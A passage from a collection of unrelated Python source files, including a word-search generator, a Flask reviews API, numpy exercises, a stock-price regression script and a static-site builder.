setup(app):\n \"\"\"Setup Sphinx extension.\"\"\"\n app.add_lexer('cton', CretonneLexer())\n\n return { 'version' : '0.1' }\n","sub_path":"docs/cton_lexer.py","file_name":"cton_lexer.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"123769127","text":"from nltk.corpus import words\nimport random\n\nclass WordSearch:\n def __init__(self, numPairs, gridSize=10):\n self.gridSize = gridSize\n self.numPairs = numPairs\n self.word_list = [word for word in words.words() if 3 <= len(word) <= 3]\n self.grid = self.init_grid()\n self.pairs = self.init_pairs()\n self.intersections = []\n\n def fill_grid(self, populate=False, tries=100):\n # Test for viable positions\n for pair in self.pairs:\n minx = 0\n maxx = self.gridSize - len(pair.horizontal_word)\n miny = pair.intersect[1]\n maxy = self.gridSize - len(pair.vertical_word) + pair.intersect[1]\n while tries > 0:\n word1_x = random.randint(minx, maxx)\n word1_y = random.randint(miny, maxy)\n word2_x = word1_x + pair.intersect[0]\n word2_y = word1_y - pair.intersect[1]\n if self.valid_placement(pair, word1_x, word1_y, word2_x, word2_y):\n self.place_pair(pair, word1_x, word1_y, word2_x, word2_y)\n break\n tries -= 1\n self.add_buffer()\n for row in range(self.gridSize):\n for col in range(self.gridSize):\n if not self.grid[row][col]:\n self.grid[row][col] = Block(-1, False, \"\")\n self.expand()\n if populate:\n self.add_random_letters()\n\n # Check if given coordinates are valid\n def valid_placement(self, pair, word1_x, word1_y, word2_x, word2_y):\n # horizontal\n print(pair.horizontal_word, pair.vertical_word, word1_x, word1_y, word2_x, word2_y)\n for col in range(word1_x, word1_x + len(pair.horizontal_word)):\n if self.grid[word1_y][col]:\n return False\n\n # vertical\n for row in range(word2_y, word2_y + len(pair.vertical_word)):\n if self.grid[row][word2_x]:\n return False\n\n return True\n\n # Insert the pair into our grid\n def place_pair(self, pair, word1_x, word1_y, word2_x, word2_y):\n for i in range(len(pair.horizontal_word)):\n intersect = i == pair.intersect[0]\n self.grid[word1_y][word1_x + i] = Block(self.pairs.index(pair), intersect, pair.horizontal_word[i])\n for i in range(len(pair.vertical_word)):\n intersect = i == pair.intersect[1]\n self.grid[word2_y + i][word2_x] = Block(self.pairs.index(pair), intersect, pair.vertical_word[i])\n if intersect:\n self.intersections.append(self.grid[word2_y + i][word2_x])\n\n # Fill grid with random lettered Blocks\n def add_random_letters(self):\n alphabet = 'abcdefghijklmnopqrstuvwxyz'\n for row in range(self.gridSize):\n for col in range(self.gridSize):\n if self.grid[row][col].pairId == -1:\n self.grid[row][col].letter = random.choice(alphabet)\n\n # Find location of the block\n def findBlock(self, block):\n for row in range(self.gridSize):\n for col in range(self.gridSize):\n if self.grid[row][col] == block:\n return (col, row)\n \"\"\"\n We initially add letters to grid, add buffers around left and and top of current grid. 
And then at every \n intersect we push out the rows and cols up and to the right.\n \"\"\"\n def expand(self):\n for i in range(len(self.intersections) - 1):\n intersectionBlock = self.intersections[i]\n intersectionBlockPosition = self.findBlock(intersectionBlock)\n for row in range(self.gridSize):\n for col in range(self.gridSize):\n print(self)\n block = self.grid[row][col]\n if not intersectionBlock.in_pair(block.pairId):\n if row < intersectionBlockPosition[1] and col < intersectionBlockPosition[0]:\n self.grid[row][col] = self.getIfNotInPair(intersectionBlock, self.grid[row + 1][col + 1].pairId, row + 1, col + 1)\n elif row < intersectionBlockPosition[1]:\n self.grid[row][col] = self.getIfNotInPair(intersectionBlock, self.grid[row + 1][col].pairId, row + 1, col)\n elif col < intersectionBlockPosition[0]:\n self.grid[row][col] = self.getIfNotInPair(intersectionBlock, self.grid[row][col + 1].pairId, row, col + 1)\n else:\n pass\n\n for i in range(self.gridSize):\n if not intersectionBlock.in_pair(self.grid[intersectionBlockPosition[1]][i].pairId):\n self.grid[intersectionBlockPosition[1]][i] = Block(-1, False, \"\")\n if not intersectionBlock.in_pair(self.grid[i][intersectionBlockPosition[0]].pairId):\n self.grid[i][intersectionBlockPosition[0]] = Block(-1, False, \"\")\n\n # Return the block only if the block isn't in the pair we're currently expanding\n def getIfNotInPair(self, intersection, pairId, row, col):\n if not intersection.in_pair(pairId):\n return self.grid[row][col]\n else:\n return Block(-1, False, \"\")\n\n # Add buffers to the left and top of the current grid\n def add_buffer(self):\n size = self.numPairs\n\n for i in range(size):\n self.grid.insert(0, [None for _ in range(self.gridSize)])\n\n self.gridSize += size\n for i in range(self.gridSize):\n for j in range(size):\n self.grid[i].insert(0, None)\n\n def __str__(self):\n all = \"\"\n for row in range(0, self.gridSize):\n line = \"\"\n for col in range(0, self.gridSize):\n word = self.grid[row][col].letter\n if self.grid[row][col].pairId == -1:\n word = \"-\"\n line = line + word + \" \"\n all += line + \"\\n\"\n return all\n\n def display_pairs(self):\n for pair in self.pairs:\n print(pair.horizontal_word + \" \" + pair.vertical_word + \" \")\n\n def init_grid(self):\n return [[None for _ in range(self.gridSize)] for i in range(self.gridSize)]\n\n def init_pairs(self):\n return [Pair(self.word_list) for _ in range(self.numPairs)]\n\n\nclass Block:\n def __init__(self, pair_id, intersection, letter):\n self.pairId = pair_id\n self.intersection = intersection\n self.letter = letter\n\n def empty(self):\n return self.pairId == -1\n\n def in_pair(self, pair_id):\n return self.pairId == pair_id\n\nclass Pair:\n # word1 will be horizontal\n # word2 will be vertical\n\n def __init__(self, word_list):\n self.word_list = word_list\n self.horizontal_word, self.vertical_word = self.init_words()\n self.intersect = self.intersection()\n self.horizontal_word_x = None\n self.horizontal_word_y = None\n self.vertical_word_x = None\n self.vertical_word_y = None\n\n def init_words(self, tries=100):\n horizontal_word = random.choice(self.word_list)\n self.word_list.remove(horizontal_word)\n while tries > 0:\n random_word = random.choice(self.word_list)\n distinct_letters = len(set(horizontal_word + random_word))\n valid = len(set(horizontal_word)) + len(set(random_word)) != distinct_letters\n if valid:\n vertical_word = random_word\n self.word_list.remove(vertical_word)\n horizontal_word = horizontal_word.lower()\n vertical_word = 
vertical_word.lower()\n return horizontal_word, vertical_word\n tries -= 1\n # fail loudly instead of implicitly returning None when all tries are exhausted\n raise ValueError('no word sharing a letter with %s found' % horizontal_word)\n\n def in_pair(self, row, col):\n return self.in_word1(row, col) or self.in_word2(row, col)\n\n def in_word1(self, row, col):\n return row == self.horizontal_word_y and self.horizontal_word_x <= col < self.horizontal_word_x + len(self.horizontal_word)\n\n def in_word2(self, row, col):\n return col == self.vertical_word_x and self.vertical_word_y <= row < self.vertical_word_y + len(self.vertical_word)\n\n def intersection(self):\n temp = list(self.horizontal_word)\n random.shuffle(temp)\n for char in temp:\n if char in self.vertical_word:\n return self.horizontal_word.find(char), self.vertical_word.find(char)\n\n def swap_words(self):\n self.horizontal_word, self.vertical_word = self.vertical_word, self.horizontal_word\n\n def set_pos(self, word1x, word1y, word2x, word2y):\n self.horizontal_word_x = word1x\n self.horizontal_word_y = word1y\n self.vertical_word_x = word2x\n self.vertical_word_y = word2y\n\n\n\n\nw = WordSearch(2, 5)\nw.fill_grid()\nprint(w)\nw.display_pairs()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"508483325","text":"import wx\n\napp = wx.App()\n\nframe = wx.Frame(None, title = \"taylor's list\")\n \nbkg = wx.Panel(frame)\n\nopenButton = wx.Button(bkg, label = 'open')\nsaveButton = wx.Button(bkg, label = 'save')\nfilename = wx.TextCtrl(bkg)\ncontents = wx.TextCtrl(bkg, style = wx.HSCROLL | wx.TE_MULTILINE)\n\nhbox = wx.BoxSizer()\nhbox.Add(filename, proportion = 1, flag = wx.EXPAND, border = 5)\nhbox.Add(openButton, proportion = 0, flag = wx.LEFT, border = 5)\nhbox.Add(saveButton, proportion = 0, flag = wx.LEFT, border = 5)\n\nbbox = wx.BoxSizer(wx.VERTICAL)\nbbox.Add(hbox, proportion = 0, flag = wx.EXPAND | wx.ALL)\nbbox.Add(contents, proportion = 1, flag = wx.EXPAND | wx.LEFT | wx.BOTTOM | wx.RIGHT, border = 5)\n\nbkg.SetSizer(bbox)\n#frame.Centre\nframe.Show()\n\napp.MainLoop()\n","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"645703657","text":"\nsett = set()#a global variable\n\ndef permute(s, chosen=[]):\n global sett#this stmt reqrd when we write access global var\n #above stmt not reqrd for read access of global var\n if len(s) == 0:\n sett.add(''.join(chosen))\n # print(''.join(chosen))\n else:\n for i in range(len(s)):\n #choose\n ch = s[i]\n chosen.append(ch)\n s.pop(i)\n #explore\n permute(s, chosen)\n #unchoose\n s.insert(i, ch)\n chosen.pop()\n\n\npermute(list('aabc'))\nprint(sett)","sub_path":"string_perm.py","file_name":"string_perm.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"623388853","text":"import cgi\nimport datetime\n\nimport kgi\n\nfrom emapps.util import require_permission\nfrom emapps.util import eve_time\n\ndef forumsapp(environ, start_response):\n \"\"\"\n Main application interface. Dispatch over pages.\n \"\"\"\n URLCONF = [\n ('^/reputation/', view_reputation),\n ]\n return kgi.dispatch(environ, start_response, URLCONF)\n\n@require_permission('em')\ndef view_reputation(environ):\n db = kgi.connect('dbforums')\n c = db.cursor()\n c.execute(\"SELECT u.uid, u.username, addu.uid, addu.username, \"\n \" r.reputation, r.dateline, r.comments, r.pid \"\n \"FROM mybb_reputation r \"\n \" INNER JOIN mybb_users u ON r.uid = u.uid \"\n \" INNER JOIN mybb_users addu ON r.adduid = addu.uid \"\n \"ORDER BY r.dateline DESC \"\n \"LIMIT 23\")\n reputation = [(uid, username, adduid, addusername, reputation,\n datetime.datetime.utcfromtimestamp(dateline),\n comments, pid)\n for (uid, username, adduid, addusername, reputation,\n dateline, comments, pid)\n in c.fetchall()]\n return kgi.template_response('forums/reputation.html',\n user=environ[\"emapps.user\"],\n reputation=reputation)\n\n","sub_path":"lib/emapps/forums/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"109381616","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport logging\nimport os\nfrom logging.handlers import RotatingFileHandler\n\n# logger settings\nfrom config import DEBUG\n\nLOG_PATH = os.getenv(\"LOG_FILE_PATH\", \"/var/log/\")\nos.makedirs(LOG_PATH, exist_ok=True)\nlog_file = os.path.join(LOG_PATH, '{}.log'.format(\"recommend\"))\n\nLOG_LEVEL = logging.DEBUG if DEBUG else logging.INFO\nfile_handler = RotatingFileHandler(log_file, maxBytes=1024 * 1024 * 10, backupCount=5)\nfile_handler.setLevel(LOG_LEVEL)\nconsole = logging.StreamHandler()\nconsole.setLevel(LOG_LEVEL)\n\nlogging.basicConfig(\n level=LOG_LEVEL,\n format='%(asctime)s [%(levelname)s] [%(filename)s:%(lineno)s] [%(funcName)s] %(message)s',\n handlers=[file_handler, console]\n)\n","sub_path":"utils/logutils.py","file_name":"logutils.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"345477867","text":"import urllib.request\nimport re\n\nquery = \"moves like jaggers\"\n\ndef search_yt(a):\n a = a.replace(' ','+')\n html = urllib.request.urlopen(\"https://www.youtube.com/results?search_query=\"+a)\n decoded = html.read().decode()\n video_ids = re.findall(\"watch\\?v=(\\S{11})\", decoded)\n return video_ids\n \nvideo_ids = search_yt(query)\nfor id in video_ids:\n print('https://www.youtube.com/watch?v='+id)\n","sub_path":"Python/get-youtube-results/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"473606605","text":"class Message:\n\n def __init__(self, message=None, callback=None):\n if (message is None) and not(callback is None):\n self.callback = callback\n self.content = callback.data\n self.id = callback.message.message_id\n self.user_id = callback.from_user.id\n self.type = 'callback'\n elif not(message is None) and (callback is None):\n self.message = message\n self.content = message.text\n self.id = message.message_id\n self.user_id = message.from_user.id\n self.type = 'message'\n def is_restart(self):\n restart_arr = ['restart','/restart','start','/start','заново','старт','рестарт','меню','начало']\n for cmd in restart_arr:\n if cmd in self.content.lower():\n return True\n if self.type == 'callback' and '/start ' in self.content:\n return True\n return False\n\n def is_backbutton(self):\n if self.type == 'callback' and self.content == 'back':\n return True\n return False\n\n def is_nan(self):\n if self.type == 'callback' and self.content.lower() in ['none','null','nan','nil']:\n return True\n else:\n return False\n\n def get_referal(self):\n if '/start ' in self.content:\n if len(self.content) > 7:\n return self.content[8:]\n else:\n return None\n else:\n return None\n","sub_path":"settings/Messages.py","file_name":"Messages.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"525331982","text":"#!/usr/bin/python3\n\"\"\"module: reviews\ncontains flask api routing for Review object queries\"\"\"\nfrom api.v1.views import app_views\nfrom flask import abort, jsonify, request\nimport json\nfrom models import storage\nfrom models.state import State\nfrom models.city import City\nfrom models.place import Place\nfrom models.review import Review\n\n\n@app_views.route('/places//reviews',\n methods=['GET'], strict_slashes=False)\ndef view_reviews(place_id):\n \"\"\"returns list of reivews for a given place\"\"\"\n linked_place = storage.get(\"Place\", place_id)\n if linked_place is None:\n abort(404)\n review_list = [val.to_dict() for val in storage.all(\"Review\").values()]\n reviews = [review for review in review_list\n if review['place_id'] == place_id]\n return jsonify(reviews)\n\n\n@app_views.route('/reviews/', methods=['GET'], strict_slashes=False)\ndef view_one_review(review_id):\n \"\"\"returns one review\"\"\"\n a_review = storage.get(\"Review\", review_id)\n if a_review is None:\n abort(404)\n return jsonify(a_review.to_dict())\n\n\n@app_views.route('/reviews/', methods=['DELETE'],\n strict_slashes=False)\ndef delete_review(review_id):\n \"\"\"delete a review\"\"\"\n review_delete = storage.get(\"Review\", review_id)\n if review_delete is None:\n abort(404)\n storage.delete(review_delete)\n storage.save()\n return jsonify({}), 200\n\n\n@app_views.route('/places//reviews',\n methods=['POST'], strict_slashes=False)\ndef add_review(place_id):\n \"\"\"add a review to storage\"\"\"\n linked_place = storage.get(\"Place\", place_id)\n if linked_place is None:\n abort(404)\n new_review = request.get_json()\n if new_review is None:\n return jsonify({'error': \"Not a JSON\"}), 400\n # new_review is a dict\n if new_review.get(\"user_id\") is None:\n return jsonify({'error': \"Missing user_id\"}), 400\n\n linked_user = storage.get(\"User\", new_review.get(\"user_id\"))\n if linked_user is None:\n abort(404)\n if new_review.get(\"text\") is None:\n return jsonify({'error': \"Missing text\"}), 400\n new_review['place_id'] = place_id\n new_review = Review(**new_review)\n new_review.save()\n return jsonify(new_review.to_dict()), 201\n\n\n@app_views.route('/reviews/', methods=['PUT'], strict_slashes=False)\ndef update_review(review_id):\n \"\"\"update a review & save the updates to storage\"\"\"\n review_data = request.get_json()\n if review_data is None:\n return jsonify({'error': \"Not a JSON\"}), 400\n\n # check if review_id is valid\n review_update = storage.get(\"Review\", review_id)\n if review_update is None:\n abort(404)\n no_updates = ['id', 'user_id', 'place_id', 'created_at', 'updated_at']\n for attr, value in review_data.items():\n if attr in no_updates:\n pass\n else:\n setattr(review_update, attr, value)\n review_update.save()\n return jsonify(review_update.to_dict()), 200\n","sub_path":"api/v1/views/places_reviews.py","file_name":"places_reviews.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"419211231","text":"# Aufgabe 1 (Ausfuehren von Mathematischen Funktionen auf Listenelemente)\n\"\"\"Gegeben ist die Liste mit dem Namen \"list1\"\nBerechnen sie den Cosinus Wert von jedem Eintrag in der liste und speichern sie\ndas Ergebnis in \"list2\"\nBonus fuer die Pros: Verwenden Sie keine for-Schleife.\"\"\"\nlist1 = [1, 2, 3.14, 3.14/2]\n\n\n# Aufgabe 2\n\"\"\" Erstellen sie einen numpy-array so wie er auf der Powerpoint Folie \nabgebildet ist\"\"\"\n\n# Aufgabe 2.1\n\"\"\"Verwenden Sie den numpy-array aus Aufgabe 2 und berechnen Sie den Cosinus \nWert von jedem Element.\"\"\"\n\n\n# Aufgabe 3 (Erstellen einer Matrix)\n\"\"\" Erstellen sie einen numpy-array mit folgenden Dimensionen (3,5)\nJedes Element des Arrays/Matrix hat den Wert 0 \"\"\"\n\n\n# Aufgabe 4 \n\"\"\" Erstellen sie einen numpy-array mit folgenden Dimensionen (2,5)\nJedes Element des Arrays/Matrix hat den Wert 1 \"\"\"\n\n\n# Aufgabe 5\n\"\"\" Erstellen sie einen numpy-array mit folgenden Dimensionen (2,5)\nJedes Element des Arrays/Matrix hat den Wert 6 \"\"\"\n\n\n# Aufgabe 6 (Reshape)\n\"\"\" Erstellen sie einen numpy-array mit folgenden Dimensionen (3,3)\nDas erste Element ist 0, das zweite 1, das dritte 2 usw. Gehen sie wie folgt \nvor:\n1) Verwenden sie die numpy Funktion arange um eine Zahlenfolge \n im numpy Format zu erstellen\n2) Verwenden Sie die numpy Funktion reshape um aus dem 1D array einen array\n mit Dimension (3,3) zu ersetllen\"\"\"\n \n\n# Aufgabe 7 (Array manipulation)\n\"\"\" Gegeben ist der Untenstehende 1D array \"bsp_array1\", aendern sie das \nElement das die Zahl 7 hat in die Zahl 17 um\"\"\"\nbsp_array1=np.arange(8)\n\n\n# Aufgabe 8 \n\"\"\" Gegeben ist der Untenstehende 2D array \"bsp_array2\", aendern sie das \nElement das die Zahl 7 hat, in die Zahl 17 um\"\"\"\nbsp_array2=np.reshape(np.arange(8),[4,2])\n\n\n# Aufgabe 9\n\"\"\" Gegeben ist der Untenstehende 3D array \"bsp_array3\", aendern sie das \nElement das die Zahl 7 hat in die Zahl 17 um\"\"\"\nbsp_array3=np.reshape(np.arange(24),[4,3,2])\n\n\n# Aufgabe 10 (Array slicing)\n\"\"\" Gegeben ist der Untenstehende 1D array \"bsp_array4\", Erstellen Sie einen \nneuen 1D array \"sub_array4\" der die letzten 3 Elemente von \"bsp_array4\"\nbeinhaltet\"\"\"\nbsp_array4=np.arange(16)\n\n\n# Aufgabe 11\n\"\"\" Gegeben ist der Untenstehende 3D array \"bsp_array5\", \n Erstellen Sie einen neuen 1D array \"sub_array5\" der die Elemente \n [ 4, 10, 16, 22] beinhaltet. Erstellen Sie den sub_array5 in abhaengigkeit von\n bsp_array5 Verwenden sie die slicing Methode\"\"\"\nbsp_array5=np.reshape(np.arange(24),[4,3,2])\n\n\n# Aufgabe 12 (Matrix multiplication)\n\"\"\" Multiplizieren Sie die 2 Matrizen \"mat1\" und \"mat2\" mit einander\"\"\"\nmat1=np.reshape(np.arange(0,6),[2,3])\nmat2=np.reshape(np.arange(6,18),[3,4])\n\n\n# Aufgabe 13\n\"\"\" Multiplizieren Sie die 2 Matrizen \"mat3\" und \"mat4\" Elementweise mit \neinander\n\"\"\"\nmat3=np.reshape(np.arange(0,6),[2,3])\nmat4=np.reshape(np.arange(6,12),[2,3])\n\n\n# Aufgabe 14\n\"\"\" Mulitplizieren Sie jede Zeile von \"mat5\" Elementweise mit dem Vector \"vec1\"\n\"\"\"\nmat5=np.reshape(np.arange(12),[3,4])\nvec1=np.reshape(np.arange(4),[1,4])\n\n\n# Aufgabe 15\n\"\"\"Aufgabe fuer die Pros:\nGegeben ist die untenstehende Matrix. 
Berechnen Sie die Eigenwerte und \nEigenvektoren fuer diese Matrix.\"\"\"\nmat6=np.reshape(np.arange(9),[3,3])\n\n\n\n","sub_path":"P09_Numpy.py","file_name":"P09_Numpy.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
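For illustration only, one possible solution to Exercise 1 above (the bonus asks for no for loop; np.cos broadcasts over the whole array):

    import numpy as np

    list1 = [1, 2, 3.14, 3.14/2]
    list2 = np.cos(np.array(list1)).tolist()  # elementwise cosine, no explicit loop
    print(list2)  # approx [0.5403, -0.4161, -1.0000, 0.0008]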
+{"seq_id":"628702511","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\nfrom .viewsets import (\n BillViewSet,\n OrderViewSet,\n PaymentMethodViewSet,\n SellerOrderViewSet,\n)\n\nrouter = DefaultRouter()\nrouter.register(\"order\", OrderViewSet)\nrouter.register(\"paymentmethod\", PaymentMethodViewSet)\nrouter.register(\"bill\", BillViewSet)\nrouter.register(\"sellerorder\", SellerOrderViewSet)\n\nurlpatterns = [\n path(\"\", include(router.urls)),\n]\n","sub_path":"backend/checkout/api/v1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"441413899","text":"from doc_curation import blog\nfrom curation_utils import scraping\nimport logging\n\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(levelname)s:%(asctime)s:%(module)s:%(lineno)d %(message)s\")\nlogging.getLogger('charsetgroupprober').setLevel(logging.WARNING)\nlogging.getLogger(\"charsetgroupprober\").propagate = False\nlogging.getLogger('sbcharsetprober').setLevel(logging.WARNING)\nlogging.getLogger(\"sbcharsetprober\").propagate = False\n\n\ndef free_article_filter(anchor):\n lock_tags = anchor.parent.select(\".audience-lock\")\n if len(lock_tags) == 0:\n return True\n return False\n\n\ndef scrape_free_articles_from_index_anchors(url, dir_path, dry_run=False):\n browser = scraping.get_selenium_chrome(headless=True)\n article_scraper = lambda url, dir_path, dry_run: blog.scrape_post_markdown(url=url, dir_path=dir_path, dry_run=dry_run, entry_css_list=[\".single-post\", \"div.body.markup\"])\n blog.scrape_index_from_anchors(url=url, dir_path=dir_path, entry_css_list=[], anchor_css=[\"a.post-preview-title\", \".portable-archive-list a\"], article_scraper=article_scraper, urlpattern=\".*/p/[^/]+/?$\", anchor_filter=free_article_filter, browser=browser, dry_run=dry_run)\n","sub_path":"doc_curation/blog/substack.py","file_name":"substack.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"511909103","text":"import pandas as pd\nimport numpy as np\nimport quandl, math, datetime\nfrom sklearn import preprocessing, svm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nimport matplotlib.pyplot as plt\nimport pickle\nfrom matplotlib import style\nstyle.use('ggplot')\n\n# Get stock data from quandl\ndf = quandl.get(\"WIKI/GOOGL\", api_key='oH7knqk13pDCADDcQZsx')\n\n# Calculate some custom features\ndf['HL_PCT'] = (df['Adj. High'] - df['Adj. Low']) / df['Adj. Close'] * 100\ndf['PCT_change'] = (df['Adj. Close'] - df['Adj. Open']) / df['Adj. Open'] * 100\n\n# Create a new dataframe holding the features we want to use\ndf = df[['Adj. Close', 'HL_PCT', 'PCT_change', 'Adj. Volume']]\n\n# Select the column we would like to forecast\nforecast_col = 'Adj. Close'\n\n# Fill missing data with clear outliers to avoid influencing data\ndf.fillna(-99999, inplace=True)\n\n#set the distance into the future we want to predict\nforecast_out = int(math.ceil(0.01 * len(df)))\n\n# Create the Truth column\ndf['label'] = df[forecast_col].shift(-forecast_out)\n\n\n# X is the array containing all of our data features\nX = np.array(df.drop(['label'], 1))\nX = preprocessing.scale(X)\nX = X[:-forecast_out] # \nX_lately = X[-forecast_out:]\n\n\n# Drop any records missing info\ndf.dropna(inplace=True)\n\n#y contains our labels / Truth values\ny = np.array(df['label'])\n\n# This is optional based on practicality. Scales the feautres to make the model work better.\n\n\n# Split the data into training and test sets\n# 20% of the data is set aside as testing data. We don't train on the testing data so that we\n# can effectively test our model for overfitting\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\n# instantiate a classifer\nclf = LinearRegression()\n\n#Uncomment the following line to switch to SVM:\n# The SVM is much worse on this data than linear regression.\n#clf = svm.SVR()\n\n# Train / fit the model to the training data\nclf.fit(X_train, y_train)\n\n# Save the classifier for future use\n# potentially implement a loop to train a bunch of networks, track the\n# maximum efficiency, and save that one to disk...\n# creates a pickle file to store the classifier in using the dump function\n'''\nwith open('linearregression.pickle', 'wb') as f:\n pickle.dump(clf, f)\n\n# Load a previously saved classifer.\npickle_in = open('linearregression.pickle', 'rb')\nclf = pickle.load(pickle_in)\n'''\n\n# Evaluate our model against the test data we set aside and print the accuracy.\naccuracy = clf.score(X_test, y_test)\n\nforecast_set = clf.predict(X_lately)\n\nprint(forecast_set, accuracy, forecast_out)\n\ndf['Forecast'] = np.nan\nlast_date = df.iloc[-1].name\nlast_unix = last_date.timestamp()\none_day = 86400\nnext_unix = last_unix + one_day\n\nfor i in forecast_set:\n next_date = datetime.datetime.fromtimestamp(next_unix)\n next_unix += one_day\n df.loc[next_date] = [np.nan for _ in range(len(df.columns)-1)] + [i]\n\ndf['Adj. Close'].plot()\ndf['Forecast'].plot()\nplt.legend(loc=4)\nplt.xlabel('Date')\nplt.ylabel('Price')\nplt.show()\n","sub_path":"linearregression/stock1.py","file_name":"stock1.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"83756075","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom . import _compiler as compiler\nfrom . import console\nimport os, re, sys\n\n__version__ = (1, 0)\n__all__ = [\"render\", \"hammer\", \"get_all_files\", \"get_build_output\", \"Mode\", \"Remarkup\"]\n\nclass Remarkup:\n def __init__(self):\n pass\n __version__ = (1, 0)\n\nconsole.aware(\"Frame Studios -- Sledge\")\n\nnullstr = \"\"\n\nshould_return = False\n# root # curdir\nbasespace = workshop = nullstr\n\nframerc = {}\nignore = ()\n_filter = ()\n\nconfile = \".framerc\"\next = \".html\"\nn = \"\\n\"\n\nstatus = [\"sorry it failed. Check to see if you left \\\nsome nails in your pocket\", \"completed\"]\n\nIndexer = None\n_mode = None\n\n_ptrns = [r\"(?:\\..+)$\", r\"([ \\t]*)\\$\\{FRAME::BODY\\}\", \n r\"[ \\t]*\\$\\{FRAME::BODY\\}\", r\"\\$\\{FRAME::TITLE\\}\", \n r\"\\$\\{FRAME::BODY\\}\", r\"\\$\\{FRAME::LASTMOD\\}\", \n r\"\\$\\{FRAME::METAS::%s\\}\"]\n\n\nfeedout = nullstr\n\n# \nclass Mode:\n def __init__(self):\n raise TypeError('object of type enum cannot be instatiated')\n DIR_MODE = compiler.Compiler.DIR_MODE\n FILE_MODE = compiler.Compiler.FILE_MODE\n LAYOUT_MODE = compiler.Compiler.LAYOUT_MODE\n\n\ndef recurseAddress(o, x, i=0):\n try:\n return o[x[i]] if i == (len(x) - 1) else recurseAddress(o[x[i]], x, i+1)\n except KeyError:\n console.warn(\"value at address '{}' is null-string\".format(x))\n return None\n\ndef specifics(frameup, pane):\n allFormat = re.findall(r\"([ \\t]*)\\x24\\x7B(.+?)\\x7D(?:\\x5B([\\d*]+)\\x5D)?\", frameup)\n for tab, each, index in allFormat:\n each_ = each.lstrip().split(\"::\")\n if each_[1] != \"METAS\":\n each_ = each_[1:]\n else:\n each_ = ['meta'] + each_[2:]\n paneValue = recurseAddress(pane, each_, 0)\n if paneValue is None:\n console.warn(\"could not resolve address \\\"{}\\\"\".format(each))\n paneValue = nullstr\n if type(paneValue) is list:\n index = str(index)\n index = int(index) if index.isdigit() else index\n ptrn = u\"%s\\x24\\x7B%s\\x7D\\x5B%s\\x5D\"%(tab, each, index)\n if index == \"*\" or index == \"\":\n paneValue = \", \".join(paneValue)\n paneValue = _doTabs(paneValue, tab)\n frameup = frameup.replace(ptrn, paneValue)\n else:\n paneValue = paneValue[index]\n paneValue = _doTabs(paneValue, tab)\n frameup = frameup.replace(ptrn, paneValue)\n else:\n paneValue = _doTabs(paneValue, tab)\n ptrn = u\"%s\\x24\\x7B%s\\x7D\"%(tab,each)\n frameup = frameup.replace(ptrn, paneValue)\n return frameup\n\ndef render(src, mode=Mode.DIR_MODE):\n global _mode \n _mode = mode\n fname = src if mode & 3 else None\n if src is None or src == nullstr:\n console.warn(\"nothing to build\")\n return None\n fr = compiler.Compiler()\n fr.inform(mode, fname, basespace, workshop, framerc)\n return fr.compile(src, mode)\n\ndef get_all_files(basedir, ignore=None, _filter=None):\n global workshop, feedout, basespace\n import fnmatch\n if _filter is None or ignore is None:\n # it should never come to this\n raise TypeError(\"expected filter and ignore to be of type 'list' got 'NoneType'\")\n ignore = [os.path.join(basespace, d) for d in ignore]\n ignore = [''] if len(ignore) < 1 else ignore\n\n allfiles = os.listdir(basedir)\n dirsOnly = os.listdir(basedir)\n temp = []\n workshop = basedir\n\n for n in range(len(ignore)):\n for eachfile in allfiles:\n abs_eachfile = os.path.join(basedir, eachfile)\n if os.path.isfile(abs_eachfile) and not fnmatch.fnmatch(abs_eachfile, ignore[n]):\n temp.append(eachfile)\n dirsOnly.remove(eachfile)\n for i in 
